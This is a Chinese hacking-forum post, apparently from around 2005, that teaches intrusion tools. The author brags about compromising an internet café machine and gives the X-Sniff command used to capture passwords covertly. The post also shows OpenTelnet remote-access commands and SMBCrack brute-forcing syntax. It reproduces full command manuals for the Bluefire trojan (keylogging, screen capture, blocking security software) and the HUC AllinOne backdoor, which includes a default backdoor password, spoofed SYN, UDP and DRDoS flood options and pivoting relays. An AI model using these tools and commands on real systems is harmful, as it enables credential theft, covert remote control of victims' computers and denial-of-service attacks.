|
![]() | 作者: songsje302 [songsje302]
![]() |
登录 |
后门类的有: Hall hacktelnet BackDoor Rmistaller winshell 蓝火 Win2000/NT密码破解类的有: SMBCrack 扫描类的就没什么讲的了都是有用户界面的。只要输入对方的ip进行扫描就行了。 生成字典类也比较简单也有界面,他会要你选择用什么生成字典是纯数字呢?还是字母等等。 嗅探类的我挑X-Sniff来说: X-Sniff可捕获局域网内FTP/SMTP/POP3/HTTP协议密码。 运行参数说明: xsniff <选项> <选项>含义如下: -tcp : 输出TCP数据报 -udp : 输出UDP数据报 -icmp : 输出ICMP数据报 -pass : 过滤密码信息 -hide : 后台运行 -host : 解析主机名 -addr <IP地址> : 过滤IP地址 -port <端口> : 过滤端口 -log <文件名> : 将输出保存到文件 -asc : 以ASCII形式输出 -hex : 以16进制形式输出 比如: 我入侵了xx网吧的Host(这时已经telnet上去了,哈哈!爽啊~~HOHOHO!),输入: c:\xsniff.exe -hide -pass -log c:\winnt\pass.log 这句话的意思是监听所有通过这台主机的密码(哈哈!比不一会什么邮箱账号,游戏账号一大把啊)。并把截获到的密码放在c:\winnt目录下的password文件中! 键盘纪录的我比较喜欢用广外幽灵,他操作简单只要现在要纪录键盘的文件就行了。 代理的代理猎手是进行大面积的扫描代理只要输入IP范围就ok了! 后门类的我说说hacktelnet他有2个文件分别是OpenTelnet,ResumeTelnet。 OpenTelnet是用来打开对方的telnet只有知道了对方的用户名和密码还有存在空连接就可以这样使用: OpenTelnet.exe \\IP <帐号> <密码> <NTLM认证方式> <Telnet端口> <NTLM认证方式>: 0: 不使用 NTLM 身份验证。 1: 先尝试 NTLM 身份验证。如果失败,再使用用户名和密码。 2: 只使用 NTLM 身份验证。 (假设IP为192.168.1.1,用户名为admin,密码是:123456) c:\opentelnet \\192.168.1.1 admin 123456 1 9000 这样我们就可以: c:\telnet 192.168.1.1 9000 如果对方的密码为空可以这样: c:\opentelnet \\192.168.1.1 admin "" 1 9000 另外那个ResumeTelnet是用来恢复Telnet配置的,并关闭Telnet服务器,它的用法: ResumeTelnet.exe \\ip <帐号> <密码> 例如: c:\resumetelnet \\192.168.1.1 admin 123456 这下就可以了! 另外附带一下hall和蓝火的帮助文件。感兴趣的可以看看。 蓝色火焰0.5 Preview 2版帮助文档 ================================== ●注意:从本版本开始,蓝色火焰的服务端由配置器生成!!! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^●使用本控制程序的基本条件是 ------有机器被你控制了,也就是说有机器被你装上了蓝色火焰服务端(由配置器生成的)! 接下来,喜欢上bbs或者mud的朋友就容易得多了,你把那台机当成一个bbs或者mud就可以了,只是要注意:端口是19191 简单点也行,跟着我来吧: 你要做的很简单,就是打开windows(不一定哦) 开始菜单->运行->输入telnet xxx.xxx.xxx.xxx 19191 这里xxx.xxx.xxx.xxx是你控制那台机的IP地址,怎么知道?$@#%#-----别问我哦,我也不知道哦。 端口是固定的19191,如果连上(也就是你可以为所欲为的),你就会看到如下画面: ***************“蓝色火焰”服务器端.*************** *************** 版本: V 0.5 Preview 2…… ************* *************** Copyright by Vinsa,2001.10****** Bluefire-> 这是蓝色火焰的提示符,本程式需要在这个提示符下输入命令,以达到远程控制目的 ======================================== 命令详解帮助 : 1 help 显示简要帮助信息 2 exit 退出当前连接 3 ver 显示版本信息 4 list 列出当前进程 5 passwd 列出记录的密码信息 6 clearpw 清空记录的密码信息 7 sysinfo 列出计算机的详细信息 8 halt 挂起 9 screen 运行屏幕保护程序 10 sice? 检测是否运行了Soft-ice如果有就…… 11 force 注销当前用户 12 logoff 注销 13 shutdown 关机 14 reboot 重启 15 poweroff 强行关机 ---------------------------------------------------------- 16 kill [Process ID] 杀死进程,格式如kill fffec309 其中fffec309是进程号,可以用list命令得到 ---------------------------------------------------------- 17 hide [desktop/taskbar/start/trayicon/clock] 隐藏……,如 隐藏桌面: hide desktop 隐藏任务栏: hide taskbar 隐藏开始按钮: hide start 隐藏右下角图标: hide trayicon 隐藏时钟: hide clock ---------------------------------------------------------- 18 show [desktop/taskbar/start/trayicon/clock] 显示…… 对应上面 …… ---------------------------------------------------------- 19 disable [mouse/desktop/task/taskbar/start/cad] 锁定…… 锁定鼠标: disable mouse 锁定桌面: disable desktop 锁定任务栏:disable task 锁定开始按钮:disable start 锁定Ctrl+Alt+delete: disable cad ---------------------------------------------------------- 20 enabled [mouse/desktop/task/taskbar/start/cad] 把上面锁定的解锁 ---------------------------------------------------------- 21 open [monitor/driver/ftp/http [dir]] 打开…… 打开显示器: open monitor 打开光驱: open driver 打开Ftp服务器: open ftp 打开后就可以用各种ftp客户端控制, 比如cuteFtp,leechftp,甚至Flashget的站点资源探素器都可以进行浏览和文件管理 打开http服务器: open http c:\windows 这样表示以c:\windows为主目录进行web发布, 当然可以用IE,Netscape,Opera等等浏览器进行访问和下载文件 ★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★ 蓝色火焰0.4特色功能: 这一功能充满着幻想,用虚拟Web页的形式 实现了用 浏览器(IE,Netscape,Opera等):察看系统信息,察看(/清空)捕获的密码, ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^看(/清空)纪录的键盘,捕获屏幕,进程管理(列出/杀死进程),关闭计算机等功能 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ 相当于由一般的TCP/IP协议控制的木马转变成用http协议控制超级木马,可以绕过一些防火墙,呵呵 ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^要open http 然后 http://xxx.xxx.xxx.xxx就会出现控制选单!!! 然后一切都这么简单! ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★★ 也可以直接浏览捕获的屏幕图像 --------------------------------------- 22 close [monitor/driver/ftp/http] 关闭…… 对应上面的 --------------------------------------- 23 catch [Jpeg Filename] 捕获当前屏幕 如 catch c:\screen.jpg 然后可以open http c: 打开http服务器, 在IE的地址栏里输入 http://XXX.XXX.XXX.XXX/screen.jpg就可以浏览到屏幕图像 ^^^^^^^^^^^^^^^ 这些表示对方机器的IP地址 open http 打开IE输入 http://xxx.xxx.xxx.xxx 选择抓取屏幕就ok了 --------------------------------------- 24 changeb [on/off] 交换鼠标左右键changeb on 还原鼠标左右键changeb off ---------------------------------------25 charspy [result/on/off] 查看击键记录:charspy result 禁止键盘记录:charspy off 开启键盘记录:charspy on (注意默认情况下已经开启) (记录各种按键,结果不存盘) ---------------------------------------26 keyspy [result/on/off/clear] 查看击键记录:keyspy result 禁止键盘记录:keyspy off 开启键盘记录:keyspy on (注意默认情况下已经开启) 清空键盘纪录:keyspy clear (这里和上面不同的是这里可以记录中文输入,并将结果存盘) ------------------------------------- snapexe 设置EXE文件关连 28 unsnapexe 解除EXE文件关连 ---------------------------------------29 bladd [filename]/blview/blclear 黑名单管理(在关连了exe文件后黑名单生效) 将程序加入黑名单用法: bladd regedit(禁用注册表编辑器) bladd skynet (禁用天网) bladd msconfig bladd qq2000 (这个太狠了,禁用oicq) bladd windows(禁用windows目录下所有东西) bladd ………………………………自己想加什么就加什么,看XXX不爽就bladd XXX 查看当前黑名单�bblview 清空当前黑名单 blclear -------------------------------------- 30 recstart[wav filename]/recstop/recstate 开始录制一段声音: recstart c:\test.wav 结束录制 : recstop 显示录音机当前状态 : recstate ------------------------------------ 31 cmd [dos command line] 运行dos命令:如 cmd dir cmd type c:\test.txt cmd del c:\msdos.sys(呵呵,这个删掉就麻烦了) --------------------------------------- 32 run [filename] 运行命令 如: run c:\test.wav run c:\windows\system\msconfig.exe run c:\screen.jpg -------------------------------------- 33 chat [messages you want to send] 打开聊天窗口和被控机聊天 用法很简单,如: chat 你好 chat 你被我控制了 chat 你好可怜那 chat # (这个表示关闭聊天窗口) --------------------------------------4 changetelnetport [port] 远程修改telnet端口 用法如 changetelnetport 23 表示把telnet端口修改为 23 服务端重启(restart)后生效 ---------------------------------------------------------- 35 changeftpport [port] 远程修改ftp端口 用法如 changeftpport 21 表示把ftp端口修改为 21 服务端重启(restart)后生效 ------------------------------------- 36 changehttpport [port] 远程修改http端口 用法如 changehttpport 80 表示把http端口修改为 80 服务端重启(restart)后生效 -------------------------------------- 37 changepasswd [new password] 远程修改telnet密码 用法如 changepasswd 123456 表示把telnet密码修改为 123456 服务端重启(restart)后生效 ------------------------------------ 38 viewsetup 远程察看当前配置 ------------------------------------- 39 restart 远程重启bluefire服务端,使修改的设置生效 ==================================== V0.5 Preview 2 版 快捷命令列表: l = list k = kill h = hide s = show c = catch d = disable e = enabled ! = cmd r = run : = chat pw = passwd cpw = clearpw si = sysinfo ks = keyspy cs = chatspy ks r = keyspy result ks c = keyspy clear cs r= charspy result ctp = changetelnetport cfp = changeftpport chp = changehttpport cpp = changepasswd ======================================= AllinOne V0.4 for Win2000 使用说明书. by lion. ====================================== d:\>dir HAll.exe 驱动器 D 中的卷没有标签。 卷的序列号是 8084-DE58 d:\ 的目录 2002-05-10 17:53 62,976 HAll.exe 1 个文件 62,976 字节 0 个目录 619,315,200 可用字节 d:\>HAll -h ======================= HUC AllinOne V0.40 for Win2000 = By Lion, Welcome to http://www.cnhonker.net ================= [BackDoor:] -start -bind <Password> <ListenPort> -setup [<TargetIP> <User> <Pass>] <ServiceName> <DisplayName> <Description> <Password> <ListenPort> <PackSize> [Files:] -<fget|safedel> <option> [Flood:] -<ping|udp|syn|drdos> <option> [Process:] -<fport|pslist|pskill <Pid>> [System:] -<reboot|shutdown|power> [Scanner:] -<xport|xcgi> <option> [Services:] -<slist|sdel|sstart|sstop|spause|sview|install> <option> [Transmit:] -<listen|tran|slave> <option> ///////////////////////////////////////// AllinOne 0.3功能介绍 -------------------------------------------------------------------------------- 1.Ping Backdoor(后门). [BackDoor:] 1.1 本机默认安装一个ping backdoor. -start 默认数据为: 密码为: kissme:) 监听包大小: 101 后门端口为: 138 1.2 本机开一个绑定了cmd shell的端口. -bind <Password> <ListenPort> <Password> 为验证密码. <ListemPort> 为监听端口. 1.3 指定后门参数安装后门. -setup [<TargetIP> <User> <Pass>] <ServiceName> <DisplayName> <Description> <Password> <ListenPort> <PackSize> <ServerName> 为后门的服务名. <DisplayName> 为服务显示的名称. <Description> 为服务的描述. <Password> 为控制密码. <ListenPort> 为监听端口,为(1-65535). <PackSize> 为监听包的大小,为(1-65000). [<TargetIP> <User> <Pass>] 为远程安装选项,分别指定远程IP,用户名和密码.(必须为administrator). 1.4 ping 后门的使用方法为: ping TargetIP -l 101 -n 1 telnet TargetIP 138 其中的101,138分别改成你设定的参数. -------------------------------------------------------------------------------- 2. 文件操作. [Files:] -<fget|safedel> <option> 2.1 下载Http或FTP文件功能. -fget <URLFile|FTPFile> <LocalFile> <URLFile> 为文件的Http地址. <FTPFile> 为文件的FTP地址. <LocalFile> 为下载文件要保存的路径和文件名. 2.2 安全擦除文件和目录功能.(从硬盘完全擦除) -safedel [-p passes] [-s] <File or Directory> -safedel [-p passes] -z [Drive Letter] [Opation:] -p passes 重写的次数, 默认为:3 -s 擦掉所有子目录. -z 清除 -------------------------------------------------------------------------------- 3.DoS & Flood 功能. [Flood:] -<ping|udp|syn|drdos> <option> 3.1 Ping Flood (为伪造源IP进行ICMP Ping 洪水攻击.) -ping <SourceIP> <TargetIP> <PackSize> <Delay> <SourceIP> 为要伪造的源IP,也就是将要攻击的IP. <TargetIP> 为将要利用的主机IP, 最好为一个广播地址.如192.168.0.255 <Packsize> 为发送的ICMP包的大小.为(1-65000) <Delay> 为发送数据包之间的延时.为(0-1000), 选0为无延时,推荐为1. 因为收到一个ICMP请求一般的主机都会返回一个回应. 如果一个广播地址192.168.0.255上有50台主机有ICMP回应, -ping 192.168.1.1 192.168.0.255 60000 1 将使192.168.1.1主机收到 6000 x 50倍的数据包.:) 3.2 UDP Flood.(为伪造源IP和源端口,对目标进行UDP洪水攻击.) -udp <SourceIP> <SourcePort> <TargetIP> <TargetPort> <PackSize> <Delay> <SourceIP> 为要伪造的源IP. <SourcePort> 为要伪造的源端口. 为(0-65535),选0表示为每次攻击时变化源端口. <TargetIP> 为将要攻击的主机IP. <TargetPort> 为将要攻击的主机的端口, 为(0-65535),选0表示为每次攻击时变化目标端口. <Packsize> 为发送的UDP包的大小.为(1-65400) <Delay> 为发送数据包之间的延时.为(0-1000),选0为无延时, 推荐为1. 3.3 SYN Flood.(为伪造源IP和端口,对目标进行SYN 连接请求攻击.) -syn <SourceIP> <SourcePort> <TargetIP> <TargetPort> <SourceIP> 为要伪造的源IP.(可找任意互联网IP, 攻击中会在一个B段内变化) <SourcePort> 为要伪造的源端口.为(0-65535).(可随便输入,攻击中会自动变化) <TargetIP> 为将要攻击的主机的IP. <TargetPort> 为将要攻击的主机的端口,比如80,21等. 原理为改变源地址和源端口, 发送大量的syn连接请求到目标IP,产生拒绝服务现象. 攻击能力大约为1.5W次连接请求/s(未优化版). 3.4 DRDoS Flood.(为分布式反射拒绝服务攻击.) ---其实是没多大利用价值.不过看见有人讨论,就写了一个. -drdos <TargetIP> <TargetPort> <UsingIP> <UsingPort> <TargetIP> 为将要攻击的主机的IP. <SourcePort> 为将要攻击的主机的端口. <UsingIP> 为将要利用的主机段.(找一个C段内主机存活并开放特定端口多网段的,攻击时,这个IP将自动在2个C内变化.) <UsingPort> 为将要利用的端口.如21,80,179等等. drdos 为利用发出的的syn连接请求到一批活动的主机的开放端口, 也就是源地址是不变的, 利用活动主机返回的信息来淹没源地址IP,产生flood效果. 3.5 ICMP 和UDP 实际上是个比带宽的攻击方式. 参与攻击的机器少的情况下, -syn 更容易让目标瘫痪. 参与攻击的机器多的情况下, -drdos 让目标更难防御flood攻击. -------------------------------------------------------------------------------- 4. 进程操作. [Process:] -<fport|pslist|pskill <Pid>> 4.1 查看端口跟进程的对应关系.并找出进程的文件的具体位置.(fport) -fport 4.2 查看当前进程列表. -pslist 4.3 杀掉指定进程号的进程. -pskill <Pid> <Pid> 为要杀掉的进程号,可以用pslist功能来查看具体的pid. -------------------------------------------------------------------------------- 5. 系统功能 [System:] -<reboot|shutdown|power> 5.1 重启机器 -reboot 为立刻重启动机器. 5.2 关机. -shutdown 为立刻关机. 5.3 关闭电源. -power 为立刻关机, 并关电源. -------------------------------------------------------------------------------- 6. 扫描器功能.(由于Hscan 0.32源代码丢失,暂时只有扫描端口(-xport)功能完成.由Hscan 改进而来,端口扫描速度提高4倍以上.) [Scanner:] -<xport|xcgi> [option] 6.1 端口扫描.(扫描目标机器开放的端口.) -xport <HostName|StartIP[-EndIP]> [Port1-Port2|Port1,Port2...] [Option] [Opation:] -b 取服务器返回信息. -d:delay 扫描延时,为(1-30),默认为 2s, 最大为60s. -t:thread 扫描的线程,为(1-1000),默认为200, 最大为1000. <HostName> 为要扫描的主机名. <StartIP[-EndIP]> 为要扫描的主机IP或IP段. [Port1-Port2] 为要扫描的端口范围. [Port1,Port2...] 为要扫描的端口列表. 如果没有端口信息,将默认扫描内置的32个端口.分别为: 21,22,23,25,53,79,80,110,111,113,123,135,139,143,443,445, 512,513,514,515,540, 1080,1433,1521,1524,3306,3389,5631,6000,8000,8080,12345 6.2 CGI漏洞扫描. -xcgi <HostName|StartIP[-EndIP]> [option] [Options:] -d:delay 扫描延时, 默认为4秒,最大为60秒.依网速而定. -f:file CGI漏洞列表文件,如果文件不存在或者未指定,将扫描内置的1319个CGI漏洞列表. -p:port 要扫描的WEB端口. -g:post 用POST模式代替GET. -t:thread 扫描进程,默认为100,最大为500. -u:url 扫描单个URL. -------------------------------------------------------------------------------- 7. 服务操作. [Services:] -<slist|sdel|sstart|sstop|spause|sview|install> <option> 7.1 为列出本机或远程主机的服务. -slist [<TargetIP> <User> <Pass>] all|running|win32|driver> <all> 为列出所有服务. <running> 为列出所有运行中的服务. <win32>和<driver> 分别为要列出的服务的类型. [<TargetIP> <User> <Pass>] 为远程查看服务选项,分别指定远程IP,用户名和密码.(必须为administrator). 7.2 删除一个本机或远程主机的服务. -sdel [<TargetIP> <User> <Pass>] <ServiceName> <ServiceName> 为将要删除的服务名. [<TargetIP> <User> <Pass>] 同上. 7.3 启动一个本机或远程主机的服务. -sstart [<TargetIP> <User> <Pass>] <ServiceName> <ServiceName> 为将要启动的服务名. [<TargetIP> <User> <Pass>] 同上. 7.4 停止一个本机或者远程主机的服务. -sstop [<TargetIP> <User> <Pass>] <ServiceName> <ServiceName> 为将要停止的服务名. [<TargetIP> <User> <Pass>] 同上. 7.5 暂停一个本机或者远程主机的服务. -spause [<TargetIP> <User> <Pass>] <ServiceName> <ServiceName> 为将要暂停的服务名. [<TargetIP> <User> <Pass>] 同上. 7.6 查看一个本机或远程主机的服务的详细信息. -sview [<TargetIP> <User> <Pass>] <ServiceName> <ServiceName> 为将要查看的服务名. [<TargetIP> <User> <Pass>] 同上. 7.7 为本机或者远程主机安装一个服务. -install [<TargetIP> <User> <Pass>] <ServiceName> <DisplayName> <FilePath> 为本机或远程主机安装一个服务. <ServiceName> 为将要安装的服务名称. <DisplayName> 为将要安装的服务的显示名称. <FilePath> 为作为服务运行的程序.(必须是服务程序) -------------------------------------------------------------------------------- 8. TCP包转发功能. [Transmit:] 8.1 为监听两个端口,把两个端口上接收到的数据做一个交换. -listen <ListenPort> <AttackerPort> 一个端口等待 slave来连接, 一个等待攻击者来连接. 如果两边都有连接进来,把两边的数据做一个交换. 即 ListenPort <-> AttackerPort 8.2 为普通包转发功能,把本机的的某个端口上接收到的数据转发到指定IP的端口上. -tran <ListenPort> <DestIP> <DestPort> 即ListenPort <-> DestIP->DestPort <ListenPort> 为监听的端口 <DestIP> 为你实际要连接的目标的IP. <DestPort> 为你实际要连接的目标的端口. 如: -tran 23 192.168.0.1 23 把本机的23端口上接收到的数据转发到192.168.0.1的23端口,并把192.168.0.1的23端的返回信息转回个连接本机23端的IP. telnet localhost 23 实际上连接的是192.168.0.1的23端口. 8.3 为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口. -slave <TargetIP> <TargetPort> <ListenIP> <ListenPort> 为连接目标IP(TargetIP)的端口(TargetPort), 并连接另一个主机的监听端口, 并把两边的数据作一个交换. 3种方法结合,理论上可以突破任意一种连上互联网的内网. 最后来说说SMBCrack它是小榕写的速度很快 它的语法是: smbcrack <ip> <用户名> <字典文件的路径> [端口] |
地主 发表时间: 05-01-10 13:11 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号